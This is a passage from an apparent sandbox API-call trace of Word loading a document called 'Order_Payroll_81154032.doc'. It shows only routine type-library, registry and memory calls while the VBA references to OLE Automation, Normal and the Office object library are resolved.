lpsz="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation") returned 0x5e [0044.895] IMalloc:Alloc (This=0x7feff045380, cb=0xbe) returned 0x8133080 [0044.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", cchWideChar=95, lpMultiByteStr=0x8133080, cbMultiByte=190, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", lpUsedDefaultChar=0x0) returned 95 [0044.895] IMalloc:Free (This=0x7feff045380, pv=0x8133080) [0044.895] wcsncpy_s (in: _Destination=0x2060e0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc") returned 0x0 [0044.895] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", cchLength=0x37 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc") returned 0x37 [0044.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc", cchWideChar=56, lpMultiByteStr=0x206010, cbMultiByte=112, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc", lpUsedDefaultChar=0x0) returned 56 [0044.895] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc") returned 0 [0044.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x2063c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0044.895] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="stdole") returned 0x106093 [0044.895] strcpy_s (in: _Dst=0x2061a0, _DstSize=0x7, _Src="stdole" | out: _Dst="stdole") returned 0x0 [0044.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2061a0, cbMultiByte=7, lpWideCharStr=0x205ff0, cchWideChar=7 | out: lpWideCharStr="stdole") returned 7 [0044.896] IUnknown:AddRef (This=0x7edf740) returned 0x3 [0044.896] ITypeLib:RemoteIsName (in: This=0x7edf740, szNameBuf="stdole", lHashVal=0x106093, pfName=0x2060c0, pBstrLibName=0x205ff0 | out: pfName=0x2060c0*=0, pBstrLibName=0x205ff0) returned 0x0 [0044.896] IUnknown:Release (This=0x7edf740) returned 0x2 [0044.896] IUnknown:AddRef (This=0x3dd7b80) returned 0x3 [0044.896] ITypeLib:RemoteIsName (in: This=0x3dd7b80, szNameBuf="stdole", lHashVal=0x106093, pfName=0x2060c0, pBstrLibName=0x205ff0 | out: pfName=0x2060c0*=0, pBstrLibName=0x205ff0) returned 0x0 [0044.896] IUnknown:Release (This=0x3dd7b80) returned 0x2 [0044.896] IMalloc:Alloc (This=0x7feff045380, cb=0x208) returned 0x8060020 [0044.896] wcscpy_s (in: _Destination=0x8114ea8, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation") returned 0x0 [0044.896] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x2057a0 | out: phkResult=0x2057a0*=0x9ee) returned 0x0 [0044.896] RegOpenKeyW (in: hKey=0x9ee, lpSubKey="{00020430-0000-0000-C000-000000000046}", phkResult=0x205798 | out: phkResult=0x205798*=0x9f6) returned 0x0 [0044.897] RegEnumKeyW (in: hKey=0x9f6, dwIndex=0x0, lpName=0x2057c8, cchName=0xa | out: lpName="1.0") returned 0x0 [0044.897] RegEnumKeyW (in: hKey=0x9f6, dwIndex=0x1, lpName=0x2057c8, cchName=0xa | out: lpName="2.0") returned 0x0 [0044.897] wcscpy_s (in: _Destination=0x2057b0, _SizeInWords=0xa, _Source="2.0" | out: _Destination="2.0") returned 0x0 [0044.897] RegOpenKeyW (in: hKey=0x9f6, lpSubKey="2.0", phkResult=0x205858 | out: phkResult=0x205858*=0x9f2) returned 0x0 [0044.897] _ultoa_s (in: _Val=0x0, _DstBuf=0x2057d0, _Size=0xa, _Radix=16 | out: _DstBuf="0") returned 0x0 [0044.897] RegOpenKeyA (in: hKey=0x9f2, lpSubKey="0", phkResult=0x2057c0 | out: phkResult=0x2057c0*=0x9fa) returned 0x0 [0044.898] RegOpenKeyW (in: hKey=0x9fa, lpSubKey="win64", phkResult=0x2057c8 | out: phkResult=0x2057c8*=0xa06) returned 0x0 [0044.898] RegCloseKey (hKey=0xa06) returned 0x0 [0044.898] RegCloseKey (hKey=0x9fa) returned 0x0 [0044.898] _ultow_s (in: _Value=0x0, _Buffer=0x205860, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0044.898] RegOpenKeyW (in: hKey=0x9f2, lpSubKey="0", phkResult=0x205838 | out: phkResult=0x205838*=0x9fa) returned 0x0 [0044.899] RegQueryValueW (in: hKey=0x9fa, lpSubKey="win64", lpData=0x205880, lpcbData=0x205834 | out: lpData="C:\\Windows\\system32\\stdole2.tlb", lpcbData=0x205834) returned 0x0 [0044.899] wcscpy_s (in: _Destination=0x8060020, _SizeInWords=0x104, _Source="C:\\Windows\\system32\\stdole2.tlb" | out: _Destination="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0044.899] RegCloseKey (hKey=0x9fa) returned 0x0 [0044.899] RegCloseKey (hKey=0x9f2) returned 0x0 [0044.899] RegCloseKey (hKey=0x9f6) returned 0x0 [0044.900] RegCloseKey (hKey=0x9ee) returned 0x0 [0044.900] LoadTypeLib (in: szFile="C:\\Windows\\system32\\stdole2.tlb", pptlib=0x205ea8*=0x0 | out: pptlib=0x205ea8*=0x7ee0550) returned 0x0 [0044.900] IUnknown:QueryInterface (in: This=0x7ee0550, riid=0x7fee4035c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205ca8 | out: ppvObject=0x205ca8*=0x0) returned 0x80004002 [0044.900] ITypeLib:RemoteGetLibAttr (in: This=0x7ee0550, ppTLibAttr=0x205ca0, pDummy=0x10 | out: ppTLibAttr=0x205ca0, pDummy=0x10) returned 0x0 [0044.900] ITypeLib:RemoteGetDocumentation (in: This=0x7ee0550, index=-1, refPtrFlags=0x0, pbstrName=0x205c98, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x8114f06 | out: pbstrName=0x205c98*="OLE Automation", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x8114f06) returned 0x0 [0044.900] StringFromGUID2 (in: rguid=0x27651d0*(Data1=0x20430, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x205cc0, cchMax=39 | out: lpsz="{00020430-0000-0000-C000-000000000046}") returned 39 [0044.900] _ultow_s (in: _Value=0x2, _Buffer=0x205c0a, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0044.900] _ultow_s (in: _Value=0x0, _Buffer=0x205c0e, _BufferCount=0xe, _Radix=16 | out: _Buffer="0") returned 0x0 [0044.900] _ultow_s (in: _Value=0x0, _Buffer=0x205c12, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0044.900] wcscpy_s (in: _Destination=0x8114f88, _SizeInWords=0x5f, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0044.900] wcscpy_s (in: _Destination=0x8114f8e, _SizeInWords=0x5c, _Source="{00020430-0000-0000-C000-000000000046}" | out: _Destination="{00020430-0000-0000-C000-000000000046}") returned 0x0 [0044.900] wcscpy_s (in: _Destination=0x8114fda, _SizeInWords=0x36, _Source="#2.0#0#" | out: _Destination="#2.0#0#") returned 0x0 [0044.900] wcscpy_s (in: _Destination=0x8114fe8, _SizeInWords=0x2f, _Source="C:\\Windows\\system32\\stdole2.tlb" | out: _Destination="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0044.900] wcscpy_s (in: _Destination=0x8115028, _SizeInWords=0xf, _Source="OLE Automation" | out: _Destination="OLE Automation") returned 0x0 [0044.900] ITypeLib:LocalReleaseTLibAttr (This=0x7ee0550) returned 0x0 [0044.900] wcscpy_s (in: _Destination=0x8060020, _SizeInWords=0x104, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0044.900] wcscpy_s (in: _Destination=0x814d1e0, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0044.900] IMalloc:Free (This=0x7feff045380, pv=0x8060020) [0044.901] IUnknown:AddRef (This=0x7ee0550) returned 0x4 [0044.901] IUnknown:QueryInterface (in: This=0x7ee0550, riid=0x7fee40385a0*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205f08 | out: ppvObject=0x205f08*=0x0) returned 0x80004002 [0044.901] ITypeLib:RemoteIsName (in: This=0x7ee0550, szNameBuf="stdole", lHashVal=0x106093, pfName=0x2060c0, pBstrLibName=0x205ff0 | out: pfName=0x2060c0*=0, pBstrLibName=0x205ff0) returned 0x0 [0044.901] IUnknown:Release (This=0x7ee0550) returned 0x3 [0044.901] IMalloc:Alloc (This=0x7feff045380, cb=0x24) returned 0x7e02810 [0044.901] IMalloc:Free (This=0x7feff045380, pv=0x7fbfc00) [0044.901] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7e02840 [0044.901] IMalloc:Realloc (This=0x7feff045380, pv=0x7e02840, cb=0x50) returned 0x7f16210 [0044.901] IMalloc:Free (This=0x7feff045380, pv=0x7e02810) [0044.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=-1, lpMultiByteStr=0x206330, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0044.911] _stat64i32 (in: _FileName="Normal", _Stat=0x2064d8 | out: _Stat=0x2064d8) returned -1 [0044.912] wcscpy_s (in: _Destination=0x7e0284e, _SizeInWords=0x7, _Source="Normal" | out: _Destination="Normal") returned 0x0 [0044.912] wcscpy_s (in: _Destination=0x814d148, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0044.912] wcsncpy_s (in: _Destination=0x2060e0, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0044.912] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0044.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x206010, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0044.912] IMalloc:Realloc (This=0x7feff045380, pv=0x3e6c410, cb=0x880) returned 0x814d4f0 [0044.912] wcscpy_s (in: _Destination=0x814d938, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0044.912] wcsncpy_s (in: _Destination=0x206120, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0044.912] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0044.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x206050, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0044.912] wcsncpy_s (in: _Destination=0x2060e0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc") returned 0x0 [0044.913] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", cchLength=0x37 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc") returned 0x37 [0044.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc", cchWideChar=56, lpMultiByteStr=0x206010, cbMultiByte=112, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc", lpUsedDefaultChar=0x0) returned 56 [0044.913] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc") returned 0 [0044.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x2063c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0044.913] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0044.913] strcpy_s (in: _Dst=0x2061a0, _DstSize=0x7, _Src="Normal" | out: _Dst="Normal") returned 0x0 [0044.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2061a0, cbMultiByte=7, lpWideCharStr=0x205ff0, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0044.913] IUnknown:AddRef (This=0x7edf740) returned 0x3 [0044.913] ITypeLib:RemoteIsName (in: This=0x7edf740, szNameBuf="Normal", lHashVal=0x10d8df, pfName=0x2060c0, pBstrLibName=0x205ff0 | out: pfName=0x2060c0*=0, pBstrLibName=0x205ff0) returned 0x0 [0044.913] IUnknown:Release (This=0x7edf740) returned 0x2 [0044.913] IUnknown:AddRef (This=0x3dd7b80) returned 0x3 [0044.913] ITypeLib:RemoteIsName (in: This=0x3dd7b80, szNameBuf="Normal", lHashVal=0x10d8df, pfName=0x2060c0, pBstrLibName=0x205ff0 | out: pfName=0x2060c0*=0, pBstrLibName=0x205ff0) returned 0x0 [0044.913] IUnknown:Release (This=0x3dd7b80) returned 0x2 [0044.913] IUnknown:AddRef (This=0x7ee0550) returned 0x4 [0044.913] ITypeLib:RemoteIsName (in: This=0x7ee0550, szNameBuf="Normal", lHashVal=0x10d8df, pfName=0x2060c0, pBstrLibName=0x205ff0 | out: pfName=0x2060c0*=0, pBstrLibName=0x205ff0) returned 0x0 [0044.913] IUnknown:Release (This=0x7ee0550) returned 0x3 [0044.913] IMalloc:Alloc (This=0x7feff045380, cb=0x30) returned 0x7e71110 [0044.913] IMalloc:Free (This=0x7feff045380, pv=0x7f16210) [0044.913] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7e028a0 [0044.913] IMalloc:Realloc (This=0x7feff045380, pv=0x7e028a0, cb=0x5c) returned 0x806f390 [0044.913] IMalloc:Free (This=0x7feff045380, pv=0x7e71110) [0044.914] IMalloc:Alloc (This=0x7feff045380, cb=0x94) returned 0x8121130 [0044.914] IMalloc:Free (This=0x7feff045380, pv=0x8121130) [0044.914] CLSIDFromString (in: lpsz="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}", pclsid=0x206490 | out: pclsid=0x206490*(Data1=0x2df8d04c, Data2=0x5bfa, Data3=0x101b, Data4=([0]=0xbd, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0xde, [7]=0x52))) returned 0x0 [0044.914] IMalloc:Alloc (This=0x7feff045380, cb=0x80) returned 0x811a160 [0044.914] _ultow_s (in: _Value=0x2, _Buffer=0x20631a, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0044.914] _ultow_s (in: _Value=0x8, _Buffer=0x20631e, _BufferCount=0xe, _Radix=16 | out: _Buffer="8") returned 0x0 [0044.914] _ultow_s (in: _Value=0x0, _Buffer=0x206322, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0044.914] wcscpy_s (in: _Destination=0x810b768, _SizeInWords=0x95, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0044.914] wcscpy_s (in: _Destination=0x810b76e, _SizeInWords=0x92, _Source="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}" | out: _Destination="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 0x0 [0044.915] wcscpy_s (in: _Destination=0x810b7ba, _SizeInWords=0x6c, _Source="#2.8#0#" | out: _Destination="#2.8#0#") returned 0x0 [0044.915] wcscpy_s (in: _Destination=0x810b7c8, _SizeInWords=0x65, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL") returned 0x0 [0044.915] wcscpy_s (in: _Destination=0x810b848, _SizeInWords=0x25, _Source="Microsoft Office 15.0 Object Library" | out: _Destination="Microsoft Office 15.0 Object Library") returned 0x0 [0044.915] IMalloc:Free (This=0x7feff045380, pv=0x811a160) [0044.915] wcsncpy_s (in: _Destination=0x27a50a8, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library", _MaxCount=0x30 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#") returned 0x0 [0044.915] wcscpy_s (in: _Destination=0x27a5108, _SizeInWords=0x65, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL") returned 0x0 [0044.915] wcscpy_s (in: _Destination=0x27a5186, _SizeInWords=0x26, _Source="#Microsoft Office 15.0 Object Library" | out: _Destination="#Microsoft Office 15.0 Object Library") returned 0x0 [0044.915] wcscpy_s (in: _Destination=0x814d2a0, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library") returned 0x0 [0044.915] wcsncpy_s (in: _Destination=0x2060e0, _SizeInWords=0x108, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library") returned 0x0 [0044.915] CharLowerBuffW (in: lpsz="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library", cchLength=0x94 | out: lpsz="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office15\\mso.dll#microsoft office 15.0 object library") returned 0x94 [0044.915] IMalloc:Alloc (This=0x7feff045380, cb=0x12a) returned 0x7f66e40 [0044.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office15\\mso.dll#microsoft office 15.0 object library", cchWideChar=149, lpMultiByteStr=0x7f66e40, cbMultiByte=298, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office15\\mso.dll#microsoft office 15.0 object library", lpUsedDefaultChar=0x0) returned 149 [0044.915] IMalloc:Free (This=0x7feff045380, pv=0x7f66e40) [0044.915] wcscpy_s (in: _Destination=0x814d980, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library") returned 0x0 [0044.915] wcsncpy_s (in: _Destination=0x206120, _SizeInWords=0x108, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library") returned 0x0 [0044.915] CharLowerBuffW (in: lpsz="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library", cchLength=0x94 | out: lpsz="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office15\\mso.dll#microsoft office 15.0 object library") returned 0x94 [0044.915] IMalloc:Alloc (This=0x7feff045380, cb=0x12a) returned 0x7f66e40 [0044.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office15\\mso.dll#microsoft office 15.0 object library", cchWideChar=149, lpMultiByteStr=0x7f66e40, cbMultiByte=298, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office15\\mso.dll#microsoft office 15.0 object library", lpUsedDefaultChar=0x0) returned 149 [0044.915] IMalloc:Free (This=0x7feff045380, pv=0x7f66e40) [0044.915] wcsncpy_s (in: _Destination=0x2060e0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc") returned 0x0 [0044.916] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", cchLength=0x37 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc") returned 0x37 [0044.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc", cchWideChar=56, lpMultiByteStr=0x206010, cbMultiByte=112, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc", lpUsedDefaultChar=0x0) returned 56 [0044.916] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc") returned 0 [0044.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x2063c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0044.916] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Office") returned 0x107515 [0044.916] strcpy_s (in: _Dst=0x2061a0, _DstSize=0x7, _Src="Office" | out: _Dst="Office") returned 0x0 [0044.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2061a0, cbMultiByte=7, lpWideCharStr=0x205ff0, cchWideChar=7 | out: lpWideCharStr="Office") returned 7 [0044.916] IUnknown:AddRef (This=0x7edf740) returned 0x3 [0044.916] ITypeLib:RemoteIsName (in: This=0x7edf740, szNameBuf="Office", lHashVal=0x107515, pfName=0x2060c0, pBstrLibName=0x205ff0 | out: pfName=0x2060c0*=0, pBstrLibName=0x205ff0) returned 0x0 [0044.916] IUnknown:Release (This=0x7edf740) returned 0x2 [0044.916] IUnknown:AddRef (This=0x3dd7b80) returned 0x3 [0044.916] ITypeLib:RemoteIsName (in: This=0x3dd7b80, szNameBuf="Office", lHashVal=0x107515, pfName=0x2060c0, pBstrLibName=0x205ff0 | out: pfName=0x2060c0*=0, pBstrLibName=0x205ff0) returned 0x0 [0044.916] IUnknown:Release (This=0x3dd7b80) returned 0x2 [0044.916] IUnknown:AddRef (This=0x7ee0550) returned 0x4 [0044.916] ITypeLib:RemoteIsName (in: This=0x7ee0550, szNameBuf="Office", lHashVal=0x107515, pfName=0x2060c0, pBstrLibName=0x205ff0 | out: pfName=0x2060c0*=0, pBstrLibName=0x205ff0) returned 0x0 [0044.916] IUnknown:Release (This=0x7ee0550) returned 0x3 [0044.916] IMalloc:Alloc (This=0x7feff045380, cb=0x208) returned 0x8060020 [0044.916] wcscpy_s (in: _Destination=0x27a50a8, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library") returned 0x0 [0044.916] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x2057a0 | out: phkResult=0x2057a0*=0x9ee) returned 0x0 [0044.917] RegOpenKeyW (in: hKey=0x9ee, lpSubKey="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}", phkResult=0x205798 | out: phkResult=0x205798*=0x9f2) returned 0x0 [0044.917] RegEnumKeyW (in: hKey=0x9f2, dwIndex=0x0, lpName=0x2057c8, cchName=0xa | out: lpName="2.6") returned 0x0 [0044.918] RegEnumKeyW (in: hKey=0x9f2, dwIndex=0x1, lpName=0x2057c8, cchName=0xa | out: lpName="2.7") returned 0x0 [0044.918] RegEnumKeyW (in: hKey=0x9f2, dwIndex=0x2, lpName=0x2057c8, cchName=0xa | out: lpName="2.8") returned 0x0 [0044.918] wcscpy_s (in: _Destination=0x2057b0, _SizeInWords=0xa, _Source="2.8" | out: _Destination="2.8") returned 0x0 [0044.918] RegOpenKeyW (in: hKey=0x9f2, lpSubKey="2.8", phkResult=0x205858 | out: phkResult=0x205858*=0xa06) returned 0x0 [0044.918] _ultoa_s (in: _Val=0x0, _DstBuf=0x2057d0, _Size=0xa, _Radix=16 | out: _DstBuf="0") returned 0x0 [0044.918] RegOpenKeyA (in: hKey=0xa06, lpSubKey="0", phkResult=0x2057c0 | out: phkResult=0x2057c0*=0xa0e) returned 0x0 [0044.919] RegOpenKeyW (in: hKey=0xa0e, lpSubKey="win64", phkResult=0x2057c8 | out: phkResult=0x2057c8*=0xa16) returned 0x0 [0044.919] RegCloseKey (hKey=0xa16) returned 0x0 [0044.919] RegCloseKey (hKey=0xa0e) returned 0x0 